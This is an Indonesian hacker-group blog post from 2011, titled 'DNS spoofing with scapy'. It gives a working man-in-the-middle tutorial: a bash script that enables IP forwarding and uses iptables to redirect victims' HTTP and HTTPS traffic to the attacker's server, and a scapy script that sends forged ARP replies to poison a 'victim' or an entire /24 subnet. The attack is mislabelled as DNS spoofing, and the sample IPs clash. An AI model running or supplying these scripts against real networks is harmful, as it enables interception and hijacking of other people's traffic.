Pages

Wednesday, March 23, 2011

./DNS spoofing with scapy

bissmillah...
=============================================
Malang Cyber Crew | indonesian cyber security
=============================================
title    : DNS spoofing with scapy
auth0r   : yur4kh4
blog     : http://www.devirakhjib.uni.cc/
mail     : yur4kh4[at]yahoo[dot[com]
date     : 23-03-2011
Language : Indonesian



[*]pembuka
    tulisan ini di buat semata-mata untuk pelajaran saja, tidak ada maksud untuk merusak & meningkatkan traffic cyber crime di indonesia.
    penulis sangat berharap bahwa masyarakat indonesia bisa lebih meningkatkan security di di bidang IT (khususnya bagi para pengelola)internet cafe
    & satu hal yang terpenting penulis sangat berharap masyarakat indonesia bisa beralih ke sistem operasi yang open source..hee...
   
[*] persiapan
    " pastikan sistem operasi anda linux
    " pastikan python scapy terinstall pada sistem operasi anda
   
    jika belum terinstall python scapy, anda bisa meng install nya lewat synaptic (dalam hal ini saya menggunakan ubuntu)
    jika sudah terinstall lanjut ke tahap selanjutnya.,

[*] konfigurasi

    yang pertama lakukan IP forwading
    echo 1 > /proc/sys/net/ipv4/ip_forward
   
    kemudian non aktivkan ICMP redirect
    echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

    next IP tables setting
    Apa saja yang bisa dilakukan dengan iptables?
    Dengan kemampuan tools iptables ini, kita bisa membuat aturan (rule), untuk arus lalulintas data.
    silahkan googleing untuk penjelasan lebih mendalam.

iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat

iptables --append FORWARD --in-interface wlan0/eth0 --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0/eth0 --jump MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 10.42.43.23
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination 10.42.43.23

ini bash scriptnya..biar ga repot-repot mengetik di termilal..
   
--------------------------------------cut here--------------------------------------------------------
#########################################################
#              yur4kh4                #
#         Malang cyber crew            #
#            kill-9 crew                #
#        indonesiancoder team            #
#########################################################
#!/bin/sh
INTERFACE="wlan0" #cek interface dg mengetikan ifconfig di terminal
SERVERWEB='10.42.43.23' #ip ente

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

#clear rule..
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat

iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE

#rendirect traffic.. on my server/proxy
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination $SERVERWEB
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination $SERVERWEB
--------------------------------------cut here--------------------------------------------------------
save dengan nama: terserah.sh

selanjutnya
save script python-scapy ini dengan nama : ihir.py
--------------------------------------cut here--------------------------------------------------------
from scapy.all import *;
from time import sleep;
conf.iface='wlan0';#network card

target="10.42.43.1";#target /victim

router="10.42.43.1";#routernya

packet = ARP(); #bikin packet :P

packet.psrc = router # Gateway

packet.pdst = target # victim v.v

try:
    while 1:
        send(packet, verbose=0);
        sleep(50);
except:
    pass
--------------------------------------cut here--------------------------------------------------------

nach yg perlu anda lakukan adalah menyesuaikan

INTERFACE="wlan0" #cek interface dg mengetikan ifconfig di terminal
SERVERWEB='10.42.43.23' #ip ente

network card yang terkoneksi dengan internet serta ip local anda
&
target="10.42.43.19";#target /victim

router="10.42.43.1";#routernya

kalau ingin semua permintaan packet client berpindah ke web server anda
target="10.42.43.19/24";#target /victim

dengan begitu semua IP local client akan di alihkan ke IP local anda...:D

[*] eksekusi

root@dEviRakhjib:/home/yur4kh4# ./terserah.sh
root@dEviRakhjib:/home/yur4kh4# python ihir.py

yupzz.,..tunggu beberapa saat
semua permintaan packet akan di kirimkan / di alihkan ke IP anda...:D

greettzz.....:D

[*] penutup
    dengan di jalankannya ihir.py maka berakhir pula tulisan yang sangat sederhana ini..
    semoga sajha mudah untuk di mengerti..namun jika masih di anggap susah untuk di mengerti
    silahkan hubungi saya..^_^
    YM : yur4kh4
        ..Jangan berkata TIDAK, karena semua itu BELUM ..
+++++++++++++++++++thankz t0++++++++++++++++++++++++
[&] allah, muhammad, & seluruh pengikutnya...
[!] Malang Cyber Crew - kill-9 - Indonesian coder
[%] Arianom, Tukulesto , n4ck0 , marahmerah , kamtiez , vYc0d , xr0b0t
    contrex , mboys , Pathloader , t3ll0 , Thunder x c0de, jundab
    ibl13z , geni212 , dhomas , kalong666 ,ichal ,jos_ali_joe, mugna
        &&**akulukasaatkaupergi**&&
+++++++++++++++++++Luv der4+++++++++++++++++++++++++
mirror : http://packetstormsecurity.org/files/view/99642/dnsspoof-scapy.txt

No comments: